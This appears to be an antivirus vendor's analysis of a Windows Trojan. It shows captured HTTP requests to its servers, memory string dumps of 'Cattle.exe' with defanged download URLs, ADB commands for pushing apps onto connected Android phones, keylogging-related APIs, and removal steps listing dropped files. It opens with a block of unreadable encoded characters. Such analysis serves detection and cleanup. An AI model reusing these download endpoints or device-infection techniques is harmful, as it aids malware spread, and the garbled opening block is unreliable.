nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnL k7DvPs3WjXk7SpQ15d7jJanjjC84vAhwYDSjO
YxjLntlYG xDPkOtcC9tO841wTXAMmIvkygIBtWwdDYF4q5XRI7ZGVRlWYksgPP6AN16z9
g/z8gXEfKLrJrovlO7LE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2opEaPJrOTroz4h3K0AO
lF0xwWtDAuHIW wHOn1s4MYbXo/OU7PvgNsuRvGWEC5TiXJyfQNpBOtYm ARi1SoBtib4B
GLVKgG3Cfiy1bVioF8cfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
siuRd8jl1vezouKXPQhqxaxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvdYieTWj/98sTazQ2ZSPlr9t4Tl IHES7E2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9ayT1Lrtc3gKkE5OkoGqK/E2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPXF8/zuqkGzfJgvhj6kGQ08xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW8f
8VESpL8m4dJnx/A/B6/8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWJ3t6N9bK/kMm1FSikOK
LpHE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ50B10OT1XCNS8KQo3SDfccki1K
0oMuEGS FKNR1Tqt32KnQRoV7CxP OdSc2AQjQ4eTNulgi4jGACKspxO5/VLgi5B1WxoKL
egzIDHLzyxyGKsgm6nQO23QwErsKmAX434bv0We9PqRZmUZ Y19 ufMHLyQ0YFPMVj

<<< skipped >>>

GET /txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:34 GMT
Content-Type: text/plain
Content-Length: 247176
Last-Modified: Wed, 04 Nov 2015 14:11:46 GMT
Connection: close
ETag: "563a1222-3c588"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 684044
Last-Modified: Wed, 24 Jun 2015 10:44:45 GMT
Connection: close
ETag: "558a8a1d-a700c"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:33 GMT
Content-Type: text/plain
Content-Length: 981316
Last-Modified: Fri, 06 Nov 2015 14:21:22 GMT
Connection: close
ETag: "563cb762-ef944"
Accept-Ranges: bytes

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

Cattle.exe_3444:

`.rsrc
t.hP4S
t.hd:S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
c:\windows\temp
%s\%s
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
VID:%s
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d)   comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
c:\windows\temp\Cattle.exe
06/02/2011
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
UnhookWindowsHookEx
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardState
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetOpenUrlA
2;%SK
`#T##.#.WA3#-3&<<
.QICN,-6[?-`#=#10$  F   .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
 $###$-1?
2 (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
.iLiw-Z
 41;.Hx
,"G.Ar#_
.zCN,-6[(
`.rdml>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
adbWinpi.dll
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
IMM32.dll
IPHLPAPI.DLL
MSIMG32.dll
OLEACC.dll
OLEAUT32.dll
SETUPAPI.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s

Cattle.exe_3444_rwx_00401000_001FB000:

t.hP4S
t.hd:S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
c:\windows\temp
%s\%s
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
VID:%s
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d)   comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
c:\windows\temp\Cattle.exe
06/02/2011
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
UnhookWindowsHookEx
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardState
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetOpenUrlA
2;%SK
`#T##.#.WA3#-3&<<
.QICN,-6[?-`#=#10$  F   .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
 $###$-1?
2 (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
.iLiw-Z
 41;.Hx
,"G.Ar#_
.zCN,-6[(
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
KERNEL32.DLL
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s

Cattle.exe_3444_rwx_10018000_0002F000:

%F*>#
kN]%X
: L.xx_
Tf.rh
%CTyN(
.Qzpmz
Uexe
.Ru-]
BuFtp>
.QZ`s

Explorer.EXE_1572_rwx_00EF0000_00005000:

%WinDir%\HpE\wow64\rebuild.exe
%Program Files%\tango3\tango3.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW

Explorer.EXE_1572_rwx_00FF0000_00004000:

%System%\LQdhJ\yYJSx.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nvsvc32.exe:2544
    hdptlk.exe:2556
    ndis500.exe:2916
    yYJSx.exe:1976
    appmon.exe:3368
    %original file name%.exe:228
    MiniIE.exe:2752
    ndsqp.exe:2956
    tray.exe:3316
    traytp.exe:452
    ndislib.exe:3296

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\HpE\wow64\configWord.cf (676 bytes)
    %WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
    %System%\cBLK.dll (2341 bytes)
    %System%\clk.ini (186 bytes)
    %WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
    %WinDir%\HpE\wow64\reTcp.sys (588 bytes)
    %WinDir%\HpE\wow64\config.ini (98 bytes)
    %WinDir%\HpE\sys32\weblog.log (263 bytes)
    %WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
    %WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
    %System%\tl.dat (13 bytes)
    %System%\bc.dat (3808 bytes)
    %System%\tl.txt (1444 bytes)
    %WinDir%\HpE\First.txt (23220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
    %WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
    %System%\ndislib.exe (243 bytes)
    %WinDir%\HpE\hdptlk.exe (139 bytes)
    %WinDir%\HpE\sys32\tray.txt (221016 bytes)
    %WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
    %WinDir%\HpE\exec\traytp.exe (1794 bytes)
    %WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
    %WinDir%\HpE\MiniIE.txt (175005 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
    %System%\ndislib.txt (40972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
    %System%\bc.txt (127812 bytes)
    %WinDir%\HpE\MiniIE.exe (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
    %WinDir%\HpE\sys32\ndis500.exe (325 bytes)
    %WinDir%\HpE\sys32\whitelist.dat (2 bytes)
    %WinDir%\HpE\sys32\urlnav.dll (83 bytes)
    %System%\appmon.exe (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
    %WinDir%\HpE\sys32\tray.exe (7972 bytes)
    %WinDir%\HpE\sys32\whitelist.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
    %WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
    %System%\lhc.txt (32148 bytes)
    %WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
    %WinDir%\HpE\exec\traytp.txt (88420 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
    %WinDir%\HpE\flist.bin (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %System%\appmon.txt (263811 bytes)
    %System%\lhc.dat (185 bytes)
    %WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
    %WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
    %WinDir%\Temp\adbWinpi.dll (304 bytes)
    %WinDir%\Temp\Cattle.exe (3727 bytes)
    %WinDir%\Temp\AdbWinApi.dll (96 bytes)
    %WinDir%\Temp\TscServer.exe (1653 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
    %System%\LQdhJ\yYJSx.exe (414 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
    %WinDir%\HpE\sys32\oK455Vp (13 bytes)
    %WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
    %WinDir%\HpE\sys32\services.exe (3904 bytes)
    %WinDir%\HpE\exec\ico.ini (292 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
    %System%\v9pce8W (1629 bytes)
    %System%\weblog.log (349 bytes)
    %System%\gy17y1D.sys (22 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
